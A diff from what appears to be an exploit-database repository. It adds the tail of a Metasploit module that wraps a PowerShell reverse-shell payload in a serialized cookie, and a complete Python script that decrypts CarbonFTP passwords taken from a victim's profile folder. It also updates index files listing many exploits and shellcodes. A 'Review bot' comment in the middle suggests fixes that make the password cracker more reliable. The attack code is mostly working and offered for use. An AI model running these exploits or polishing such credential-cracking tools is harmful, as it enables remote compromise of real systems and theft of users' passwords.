+ fail_with(Failure::Unknown, "#{opts[:host]} - Something went wrong- #{res.body}")
+ end
+ end
+
+ # ======================================
+ # Create and send final exploit payload
+ # to obtain a reverse shell.
+ # ======================================
+ def send_exploit_payload
+ cmd_payload = create_payload
+ cookie_payload = create_cookie(cmd_payload)
+ if @encrypted
+ if @passphrase.blank?
+ print_error("Target requires encrypted payload, but a passphrase was not found or specified.")
+ return
+ end
+ cookie_payload = Rex::Text.encode_base64(
+ encrypt_data(@encryptor, cookie_payload, @passphrase)
+ )
+ end
+ if @dry_run
+ print_warning("DryRun enabled. No exploit payloads have been sent to the target.")
+ print_warning("Printing exploit cookie payload...")
+ print_line(cookie_payload)
+ return
+ end
+
+ # Set up the payload handlers
+ payload_instance.setup_handler
+
+ # Start the payload handler
+ payload_instance.start_handler
+
+ print_status("Sending Exploit Payload to: #{normalize_uri(target_uri.path)} ...")
+ execute_command(cookie_payload, host: datastore['RHOST'])
+ end
+
+ # ===================================
+ # Create final exploit paylod based on
+ # supplied payload options.
+ # ===================================
+ def create_payload
+ # Create payload
+ psh_cmd = "/b /c start /b /min " + cmd_psh_payload(
+ payload.encoded,
+ payload_instance.arch.first,
+ remove_comspec: true, encode_final_payload: false
+ )
+
+ psh_cmd_bytes = psh_cmd.bytes.to_a
+ cmd_size_bytes = write_encoded_int(psh_cmd.length)
+
+ # Package payload into serialized object
+ payload_object = @osf_wrapper_start + cmd_size_bytes + psh_cmd_bytes + @osf_wrapper_end
+ object_size = write_encoded_int(payload_object.length)
+
+ # Create the final seralized ObjectStateFormatter payload
+ final_payload = @osf_header + object_size + payload_object
+ b64_payload = Rex::Text.encode_base64(final_payload.pack("C*"))
+
+ vprint_status("Payload Object Created.")
+
+ return b64_payload
+ end
+end
\ No newline at end of file
diff --git a/exploits/windows/remote/48363.py b/exploits/windows/remote/48363.py
new file mode 100755
index 000000000..2f30aa3ce
--- /dev/null
+++ b/exploits/windows/remote/48363.py
@@ -0,0 +1,241 @@
+# Title: Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption
+# Date: 2020-04-20
+# Author: hyp3rlinx
+# Vendor:
+# CVE: CVE-2020-6857
+
+import time, string, sys, argparse, os, codecs
+
+#Fixed: updated for Python 3, the hex decode() function was not working in Python 3 version.
+#This should be compatible for Python 2 and 3 versions now, tested successfully.
+#Sample test password
+#LOOOOONGPASSWORD! = 219042273422734224782298223744247862350210947
+
+key="97F" #2431 in decimal, the weak hardcoded encryption key within the vuln program.
+chunk_sz=5 #number of bytes we must decrypt the password by.
+
+#Password is stored here:
+#C:\Users\<VICTIM>\AppData\Roaming\Neowise\CarbonFTPProjects\<FILE>.CFTP
+
+#Neowise CarbonFTP v1.4
+#Insecure Proprietary Password Encryption
+#By John Page (aka hyp3rlinx)
+#Apparition Security
+#===================================================
+
+def carbonftp_conf(conf_file):
+ p=""
+ pipe=-1
+ passwd=""
+ lst_of_passwds=[]
+ try:
+ for p in conf_file:
+ idx = p.find("Password=STRING|")
+ if idx != -1:
+ pipe = p.find("|")
+ if pipe != -1:
+ passwd = p[pipe + 2: -2]
+ print(" Password found: "+ passwd)
+ lst_of_passwds.append(passwd)
+ except Exception as e:
+ print(str(e))
+ return lst_of_passwds
+
+
+def reorder(lst):
+ k=1
+ j=0
+ for n in range(len(lst)):
+ k+=1
+ j+=1
+ try:
+ tmp = lst[n+k]
+ a = lst[n+j]
+ lst[n+j] = tmp
+ lst[n+k] = a
+ except Exception as e:
+ pass
+ return ''.join(lst)
+
+
+def dec2hex(dec):
+ tmp = str(hex(int(dec)))
+ return str(tmp[2:])
+
+
+#Updated for Python version compatibility.
+def hex2ascii(h):
+ h=h.strip()
+ passwd=""
+ try:
+ passwd = codecs.decode(h, "hex").decode("ascii")
+ except Exception as e:
+ print("[!] In hex2ascii(), not a valid hex string.")
+ exit()
+ return passwd
+
+
+def chunk_passwd(passwd_lst):
+ lst = []
+ for passwd in passwd_lst:
+ while passwd:
+ lst.append(passwd[:chunk_sz])
+ passwd = passwd[chunk_sz:]
+ return lst
+
+
+def strip_non_printable_char(str):
+ return ''.join([x for x in str if ord(x) > 31 or ord(x)==9])
+
+cnt = 0
+passwd_str=""
+def deob(c):
+
+ global cnt, passwd_str
+
+ tmp=""
+
+ try:
+ tmp = int(c) - int(key, 16)
+ tmp = dec2hex(tmp)
+ except Exception as e:
+ print("[!] Not a valid CarbonFTP encrypted password.")
+ exit()
+
+ b=""
+ a=""
+
+ #Seems we can delete the second char as its most always junk.
+ if cnt!=1:
+ a = tmp[:2]
+ cnt+=1
+ else:
+ b = tmp[:4]
+
+ passwd_str += strip_non_printable_char(hex2ascii(a + b))
+ hex_passwd_lst = list(passwd_str)
+ return hex_passwd_lst
+
+
+def no_unique_chars(lst):
+ c=0
+ k=1
+ j=0
+ for i in range(len(lst)):
+ k+=1
+ j+=1
+ try:
+ a = lst[i]
+ b = lst[i+1]
+ if a != b:
+ c+=1
+ elif c==0:
+ print("[!] Possible one char password?: " +str(lst[0]))
+ return lst[0]
+ except Exception as e:
+ pass
+ return False
+
+
+def decryptor(result_lst):
+
+ global passwd_str, sz
+
+ print(" Decrypting ... \n")
+ for i in result_lst:
+ print("[-] "+i)
+ time.sleep(0.1)
+ lst = deob(i)
+
+ #Re-order chars to correct sequence using custom swap function (reorder).
+ reordered_pass = reorder(lst)
+ sz = len(reordered_pass)
+
+ #Flag possible single char password.
+ no_unique_chars(lst)
+
+ print("[+] PASSWORD LENGTH: " + str(sz))
+ if sz == 9:
+ return (reordered_pass[:-1] + " | " + reordered_pass[:-2] + " | " + reordered_pass[:-3] + " | " + reordered_pass[:-4] + " | " + + reordered_pass[:-5] +" | " + reordered_pass[:-6] + " | "+ reordered_pass[:-7] + " | " + reordered_pass)
+
+ #Shorter passwords less then nine chars will have several candidates
+ #as they get padded with repeating chars so we return those.
+
+ passwd_str=""
+ return reordered_pass
+
+
+def display_cracked_passwd(sz, passwd):
+ if sz==9:
+ print("[*] PASSWORD CANDIDATES: "+ passwd + "\n")
+ else:
+ print("[*] DECRYPTED PASSWORD: "+passwd + "\n")
+
+
+def parse_args():
+ parser = argparse.ArgumentParser()
+ parser.add_argument("-u", "--user", help="Username to crack a directory of Carbon .CFTP password files")
+ parser.add_argument("-p", "--encrypted_password", help="Crack a single encrypted password")
+ return parser.parse_args()
+
+
+def main(args):
+
+ global passwd_str, sz
+ victim=""
+
+ if args.user and args.encrypted_password:
+ print("[!] Supply a victims username -u or single encrypted password -p, not both.")
+ exit()
+
+ print("[+] Neowise CarbonFTP v1.4")
+ time.sleep(0.1)
+ print("[+] CVE-2020-6857 Insecure Proprietary Password Encryption")
+ time.sleep(0.1)
+ print("[+] Version 2 Exploit fixed for Python 3 compatibility")
+ time.sleep(0.1)
+ print("[+] Discovered and cracked by hyp3rlinx")
+ time.sleep(0.1)
+ print("[+] ApparitionSec\n")
+ time.sleep(1)
+
+ #Crack a dir of carbonFTP conf files containing encrypted passwords -u flag.
+ if args.user:
+ victim = args.user
+ os.chdir("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/")
+ dir_lst = os.listdir(".")
+ for c in dir_lst:
+ f=open("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/"+c, "r")
+ #Get encrypted password from conf file
+ passwd_enc = carbonftp_conf(f)
+ #Break up into 5 byte chunks as processed by the proprietary decryption routine.
+ result_lst = chunk_passwd(passwd_enc)
+ #Decrypt the 5 byte chunks and reassemble to the cleartext password.
+ cracked_passwd = decryptor(result_lst)
+ #Print cracked password or candidates.
+ display_cracked_passwd(sz, cracked_passwd)
+ time.sleep(0.3)
+ passwd_str=""
+ f.close()
+
+
+ #Crack a single password -p flag.
+ if args.encrypted_password:
+ passwd_to_crack_lst = []
+ passwd_to_crack_lst.append(args.encrypted_password)
+ result = chunk_passwd(passwd_to_crack_lst)
+ #Print cracked password or candidates.
+ cracked_passwd = decryptor(result)
+ display_cracked_passwd(sz, cracked_passwd)
+
+
+if __name__=="__main__":
+
+ parser = argparse.ArgumentParser()
+
+ if len(sys.argv)==1:
+ parser.print_help(sys.stderr)
+ exit()
+
+ main(parse_args())
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 083c698cc..b1b0f9065 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
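Review bot: The module-level counter `cnt` that `deob` increments is never reset, so in the `-u` directory loop every file after the first enters `deob` with `cnt == 1` and its first chunk is decoded through the `b = tmp[:4]` branch instead of the `a = tmp[:2]` branch the first file gets; `main` resets `passwd_str` between files but not `cnt`, which presumably is an oversight rather than intended. Resetting both at the top of `decryptor` keeps each password's decode independent: `global cnt, passwd_str, sz` followed by `cnt = 0` and `passwd_str = ""`. Separately, the `__main__` guard builds a fresh `argparse.ArgumentParser()` only to call `print_help` on it, so running the script with no arguments prints a usage line with neither `-u` nor `-p` listed; moving the `len(sys.argv) == 1` check into `parse_args`, where the populated parser exists, restores the real help text. The `except Exception as e: pass` in `reorder` and `no_unique_chars` exists only to absorb the `IndexError` at the end of the list, and naming `IndexError` there would stop the handler from also hiding any genuine bug in the swap logic.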
@@ -6692,6 +6692,17 @@ id,file,description,date,author,type,platform,port
 48259,exploits/windows/dos/48259.py,"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)",2020-03-27,"Ivan Marmolejo",dos,windows,
 48269,exploits/windows/dos/48269.py,"FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)",2020-03-31,"Paras Bhatia",dos,windows,
 48276,exploits/windows/dos/48276.py,"DiskBoss 7.7.14 - Denial of Service (PoC)",2020-04-01,"Paras Bhatia",dos,windows,
+48284,exploits/windows/dos/48284.py,"Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC)",2020-04-06,0xMoHassan,dos,windows,
+48285,exploits/windows/dos/48285.py,"SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC)",2020-04-06,0xMoHassan,dos,windows,
+48286,exploits/windows/dos/48286.py,"Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC)",2020-04-06,0xMoHassan,dos,windows,
+48287,exploits/windows/dos/48287.py,"Frigate 3.36 - Denial of Service (PoC)",2020-04-06,inter,dos,windows,
+48288,exploits/windows/dos/48288.py,"UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
+48290,exploits/windows/dos/48290.py,"UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
+48291,exploits/windows/dos/48291.py,"UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
+48292,exploits/windows/dos/48292.txt,"ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
+48301,exploits/linux/dos/48301.py,"dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)",2020-04-07,JosueEncinar,dos,linux,
+48302,exploits/windows/dos/48302.py,"ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)",2020-04-07,chuyreds,dos,windows,
+48305,exploits/windows/dos/48305.py,"AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)",2020-04-10,chuyreds,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10101,7 +10112,7 @@ id,file,description,date,author,type,platform,port
 40938,exploits/linux/local/40938.py,"RedStar 3.0 Server - 'Shellshock' 'BEAM' / 'RSSMON' Command Injection",2016-12-18,"Hacker Fantastic",local,linux,
 40943,exploits/linux/local/40943.txt,"Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",local,linux,
 40950,exploits/aix/local/40950.sh,"IBM AIX 6.1/7.1/7.2 - 'Bellmail' Local Privilege Escalation",2016-12-22,"Hector X. Monsegur",local,aix,
-40953,exploits/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Local Privilege Escalation",2016-12-22,"Luka Pusic",local,linux,
+40953,exploits/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Local Privilege Escalation",2016-12-22,"Jaka Hudoklin",local,linux,
 40956,exploits/macos/local/40956.c,"Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",local,macos,
 40957,exploits/macos/local/40957.c,"Apple macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",local,macos,
 40962,exploits/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",local,linux,
@@ -11011,6 +11022,23 @@ id,file,description,date,author,type,platform,port
 48277,exploits/windows/local/48277.py,"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)",2020-04-01,Hodorsec,local,windows,
 48279,exploits/windows/local/48279.py,"DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC)",2020-04-02,"Paras Bhatia",local,windows,
 48281,exploits/windows/local/48281.py,"AIDA64 Engineer 6.20.5300 - 'Report File' filename Buffer Overflow (SEH)",2020-04-03,Hodorsec,local,windows,
+48283,exploits/windows/local/48283.txt,"Memu Play 7.1.3 - Insecure Folder Permissions",2020-04-06,chuyreds,local,windows,
+48293,exploits/windows/local/48293.py,"Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)",2020-04-06,"Felipe Winsnes",local,windows,
+48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows,
+48306,exploits/windows/local/48306.txt,"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path",2020-04-10,MgThuraMoeMyint,local,windows,
+48314,exploits/windows/local/48314.py,"Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)",2020-04-13,boku,local,windows,
+48317,exploits/windows/local/48317.py,"B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter)",2020-04-14,"Andy Bowden",local,windows,
+48329,exploits/windows/local/48329.py,"BlazeDVD 7.0.2 - Buffer Overflow (SEH)",2020-04-15,areyou1or0,local,windows,
+48337,exploits/macos/local/48337.rb,"VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)",2020-04-16,Metasploit,local,macos,
+48339,exploits/windows/local/48339.py,"Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP)",2020-04-17,"Bailey Belisario",local,windows,
+48344,exploits/windows/local/48344.py,"Code Blocks 16.01 - Buffer Overflow (SEH) UNICODE",2020-04-17,T3jv1l,local,windows,
+48346,exploits/windows/local/48346.py,"Atomic Alarm Clock 6.3 - Stack Overflow (Unicode+SEH)",2020-04-20,boku,local,windows,
+48350,exploits/windows/local/48350.py,"Nsauditor 3.2.1.0 - Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite))",2020-04-20,Cervoise,local,windows,
+48351,exploits/windows/local/48351.py,"Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)",2020-04-20,bzyo,local,windows,
+48352,exploits/windows/local/48352.txt,"Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path",2020-04-20,boku,local,windows,
+48359,exploits/solaris/local/48359.c,"Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation",2020-04-21,"Marco Ivaldi",local,solaris,
+48364,exploits/windows/local/48364.py,"RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)",2020-04-22,"Felipe Winsnes",local,windows,
+48378,exploits/windows/local/48378.txt,"Popcorn Time 6.2 - 'Update service' Unquoted Service Path",2020-04-24,"Uriel Yochpaz",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18074,7 +18102,17 @@ id,file,description,date,author,type,platform,port 48273,exploits/multiple/remote/48273.rb,"IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)",2020-03-31,Metasploit,remote,multiple, 48274,exploits/hardware/remote/48274.rb,"DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)",2020-03-31,Metasploit,remote,hardware, 48275,exploits/windows/remote/48275.rb,"SharePoint Workflows - XOML Injection (Metasploit)",2020-03-31,Metasploit,remote,windows, -6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, +48331,exploits/linux_mips/remote/48331.rb,"TP-Link Archer A7/C7 - Unauthenticated LAN Remote Code Execution (Metasploit)",2020-04-16,Metasploit,remote,linux_mips,20002 +48332,exploits/java/remote/48332.msf,"Liferay Portal - Java Unmarshalling via JSONWS RCE (Metasploit)",2020-04-16,Metasploit,remote,java, +48333,exploits/linux/remote/48333.rb,"ThinkPHP - Multiple PHP Injection RCEs (Metasploit)",2020-04-16,Metasploit,remote,linux, +48334,exploits/linux/remote/48334.rb,"Pandora FMS - Ping Authenticated Remote Code Execution (Metasploit)",2020-04-16,Metasploit,remote,linux, +48335,exploits/php/remote/48335.rb,"PlaySMS - index.php Unauthenticated Template Injection Code Execution (Metasploit)",2020-04-16,Metasploit,remote,php, +48336,exploits/windows/remote/48336.rb,"DotNetNuke - Cookie Deserialization Remote Code Execution (Metasploit)",2020-04-16,Metasploit,remote,windows, +48338,exploits/multiple/remote/48338.rb,"Apache Solr - Remote Code Execution via Velocity Template (Metasploit)",2020-04-16,Metasploit,remote,multiple, +48343,exploits/linux/remote/48343.rb,"Nexus Repository Manager - Java EL Injection RCE (Metasploit)",2020-04-17,Metasploit,remote,linux, +48353,exploits/linux/remote/48353.rb,"Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)",2020-04-20,Metasploit,remote,linux, +48363,exploits/windows/remote/48363.py,"Neowise CarbonFTP 
1.4 - Insecure Proprietary Password Encryption",2020-04-21,hyp3rlinx,remote,windows, +6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, 53,exploits/cgi/webapps/53.c,"CCBILL CGI - 'ccbillx.c' 'whereami.cgi' Remote Code Execution",2003-07-10,knight420,webapps,cgi, @@ -42359,6 +42397,7 @@ id,file,description,date,author,type,platform,port 47893,exploits/hardware/webapps/47893.js,"Sony Playstation 4 (PS4) < 6.72 - WebKit Code Execution (PoC)",2019-12-31,"TJ Corley",webapps,hardware, 47895,exploits/java/webapps/47895.py,"Oracle Weblogic 10.3.6.0.0 - Remote Command Execution",2020-01-09,james,webapps,java, 47898,exploits/php/webapps/47898.py,"Pandora 7.0NG - Remote Code Execution",2020-01-10,Askar,webapps,php, +48368,exploits/php/webapps/48368.txt,"User Management System 2.0 - Persistent Cross-Site Scripting",2020-04-23,Besim,webapps,php, 47899,exploits/php/webapps/47899.py,"PixelStor 5000 K:4.0.1580-20150629 - Remote Code Execution",2020-01-10,.:UND3R:.,webapps,php, 47900,exploits/linux/webapps/47900.txt,"ASTPP 4.0.1 VoIP Billing - Database Backup Download",2020-01-10,"Fabien AUNAY",webapps,linux, 47901,exploits/multiple/webapps/47901.sh,"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)",2020-01-11,"Project Zero India",webapps,multiple, 
@@ -42526,3 +42565,53 @@ id,file,description,date,author,type,platform,port 48270,exploits/hardware/webapps/48270.py,"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware, 48271,exploits/hardware/webapps/48271.py,"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware, 48280,exploits/php/webapps/48280.py,"Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution",2020-04-03,"Basim Alabdullah",webapps,php, +48289,exploits/php/webapps/48289.txt,"LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,php, +48294,exploits/multiple/webapps/48294.rb,"Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit)",2020-04-06,"Mehmet Ince",webapps,multiple, +48295,exploits/multiple/webapps/48295.txt,"WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting",2020-04-06,"Gal Weizman",webapps,multiple, +48296,exploits/php/webapps/48296.py,"Bolt CMS 3.7.0 - Authenticated Remote Code Execution",2020-04-06,r3m0t3nu11,webapps,php, +48297,exploits/php/webapps/48297.txt,"LimeSurvey 4.1.11 - 'File Manager' Path Traversal",2020-04-06,"Matthew Aberegg",webapps,php, +48300,exploits/freebsd/webapps/48300.txt,"pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,freebsd, +48303,exploits/php/webapps/48303.txt,"Django 3.0 - Cross-Site Request Forgery Token Bypass",2020-04-08,"Spad Security Group",webapps,php, +48304,exploits/hardware/webapps/48304.py,"Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)",2020-04-08,"Jacob Baines",webapps,hardware, +48308,exploits/cgi/webapps/48308.py,"Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal",2020-04-10,"Basim Alabdullah",webapps,cgi, +48310,exploits/hardware/webapps/48310.txt,"Huawei HG630 2 Router - Authentication Bypass",2020-04-13,"Eslam Medhat",webapps,hardware, 
+48311,exploits/hardware/webapps/48311.py,"TVT NVMS 1000 - Directory Traversal",2020-04-13,"Mohin Paramasivam",webapps,hardware, +48312,exploits/php/webapps/48312.txt,"Webtateas 2.0 - Arbitrary File Read",2020-04-13,"China Banking and Insurance Information Technology Management Co.",webapps,php, +48313,exploits/java/webapps/48313.txt,"WSO2 3.1.0 - Arbitrary File Delete",2020-04-13,"Raki Ben Hamouda",webapps,java, +48315,exploits/php/webapps/48315.txt,"Wordpress Plugin Media Library Assistant 2.81 - Local File Inclusion",2020-04-13,"Daniel Monzón",webapps,php, +48316,exploits/php/webapps/48316.txt,"MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection",2020-04-13,"Noam Moshe",webapps,php, +48318,exploits/hardware/webapps/48318.txt,"Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution",2020-04-14,Wadeek,webapps,hardware, +48319,exploits/java/webapps/48319.txt,"WSO2 3.1.0 - Persistent Cross-Site Scripting",2020-04-14,"Raki Ben Hamouda",webapps,java, +48320,exploits/java/webapps/48320.py,"Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution",2020-04-14,nu11secur1ty,webapps,java, +48321,exploits/ios/webapps/48321.txt,"AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting",2020-04-15,Vulnerability-Lab,webapps,ios, +48322,exploits/ios/webapps/48322.txt,"SuperBackup 2.0.5 for iOS - Persistent Cross-Site Scripting",2020-04-15,Vulnerability-Lab,webapps,ios, +48323,exploits/php/webapps/48323.txt,"Pinger 1.0 - Remote Code Execution",2020-04-15,"Milad karimi",webapps,php, +48324,exploits/php/webapps/48324.txt,"SeedDMS 5.1.18 - Persistent Cross-Site Scripting",2020-04-15,Vulnerability-Lab,webapps,php, +48325,exploits/php/webapps/48325.txt,"Macs Framework 1.14f CMS - Persistent Cross-Site Scripting",2020-04-15,Vulnerability-Lab,webapps,php, +48326,exploits/php/webapps/48326.txt,"DedeCMS 7.5 SP2 - Persistent Cross-Site Scripting",2020-04-15,"Vulnerability Research Laboratory",webapps,php, +48327,exploits/ios/webapps/48327.txt,"File Transfer iFamily 
2.1 - Directory Traversal",2020-04-15,Vulnerability-Lab,webapps,ios, +48328,exploits/php/webapps/48328.txt,"Xeroneit Library Management System 3.0 - 'category' SQL Injection",2020-04-15,"Sohel Yousef",webapps,php, +48340,exploits/ios/webapps/48340.txt,"Playable 9.18 iOS - Persistent Cross-Site Scripting",2020-04-17,Vulnerability-Lab,webapps,ios, +48341,exploits/php/webapps/48341.txt,"TAO Open Source Assessment Platform 3.3.0 RC02 - HTML Injection",2020-04-17,Vulnerability-Lab,webapps,php, +48342,exploits/hardware/webapps/48342.txt,"Cisco IP Phone 11.7 - Denial of service (PoC)",2020-04-17,"Jacob Baines",webapps,hardware, +48345,exploits/php/webapps/48345.txt,"Centreon 19.10.5 - 'id' SQL Injection",2020-04-20,"Basim Alabdullah",webapps,php, +48348,exploits/php/webapps/48348.txt,"Fork CMS 5.8.0 - Persistent Cross-Site Scripting",2020-04-20,Vulnerability-Lab,webapps,php, +48354,exploits/php/webapps/48354.txt,"CSZ CMS 1.2.7 - Persistent Cross-Site Scripting",2020-04-21,"Metin Yunus Kandemir",webapps,php, +48356,exploits/php/webapps/48356.txt,"PMB 5.6 - 'logid' SQL Injection",2020-04-21,41-trk,webapps,php, +48357,exploits/php/webapps/48357.txt,"CSZ CMS 1.2.7 - 'title' HTML Injection",2020-04-21,"Metin Yunus Kandemir",webapps,php, +48358,exploits/hardware/webapps/48358.py,"IQrouter 3.3.1 Firmware - Remote Code Execution",2020-04-21,drakylar,webapps,hardware, +48360,exploits/json/webapps/48360.txt,"NSClient++ 0.5.2.35 - Authenticated Remote Code Execution",2020-04-21,kindredsec,webapps,json, +48361,exploits/php/webapps/48361.txt,"jizhi CMS 1.6.7 - Arbitrary File Download",2020-04-21,jizhicms,webapps,php, +48362,exploits/hardware/webapps/48362.txt,"P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin)",2020-04-21,LiquidWorm,webapps,hardware, +48365,exploits/hardware/webapps/48365.txt,"Edimax EW-7438RPn - Information Disclosure (WiFi Password)",2020-04-22,Besim,webapps,hardware, +48366,exploits/hardware/webapps/48366.txt,"Edimax EW-7438RPn - Cross-Site 
Request Forgery (MAC Filtering)",2020-04-22,Besim,webapps,hardware, +48367,exploits/linux/webapps/48367.txt,"Mahara 19.10.2 CMS - Persistent Cross-Site Scripting",2020-04-22,Vulnerability-Lab,webapps,linux, +48369,exploits/php/webapps/48369.txt,"User Management System 2.0 - Authentication Bypass",2020-04-23,Besim,webapps,php, +48370,exploits/php/webapps/48370.txt,"Complaint Management System 4.2 - Persistent Cross-Site Scripting",2020-04-23,Besim,webapps,php, +48371,exploits/php/webapps/48371.txt,"Complaint Management System 4.2 - Authentication Bypass",2020-04-23,Besim,webapps,php, +48372,exploits/php/webapps/48372.txt,"Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)",2020-04-23,Besim,webapps,php, +48373,exploits/cgi/webapps/48373.rb,"Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)",2020-04-23,"Dhiraj Mishra",webapps,cgi, +48375,exploits/ios/webapps/48375.txt,"Sky File 2.1.0 iOS - Directory Traversal",2020-04-23,Vulnerability-Lab,webapps,ios, +48376,exploits/multiple/webapps/48376.txt,"EspoCRM 5.8.5 - Privilege Escalation",2020-04-24,Besim,webapps,multiple, +48377,exploits/hardware/webapps/48377.txt,"Edimax EW-7438RPn 1.13 - Remote Code Execution",2020-04-24,Besim,webapps,hardware, +48380,exploits/java/webapps/48380.txt,"Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution",2020-04-24,LiquidWorm,webapps,java, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 37f30a06b..e6ca9e5cc 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv 
@@ -1019,3 +1019,5 @@ id,file,description,date,author,type,platform 48229,shellcodes/windows/48229.txt,"Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows 48243,shellcodes/linux/48243.txt,"Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)",2020-03-23,Upayan,shellcode,linux 48252,shellcodes/windows_x86-64/48252.txt,"Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)",2020-03-25,boku,shellcode,windows_x86-64 +48355,shellcodes/windows/48355.c,"Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)",2020-04-21,boku,shellcode,windows +48379,shellcodes/linux/48379.c,"Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux diff --git a/searchsploit b/searchsploit index 71229a762..f762d4fd8 100755 --- a/searchsploit +++ b/searchsploit @@ -144,24 +144,24 @@ function update() { path="${tmp_path[${i}]}" package="${tmp_package[${i}]}" - # Update from the repos (e.g. Kali) - dpkg -l "${package}" 2>/dev/null >/dev/null + ## Update from the repos (e.g. Kali) + apt-cache search "${package}" 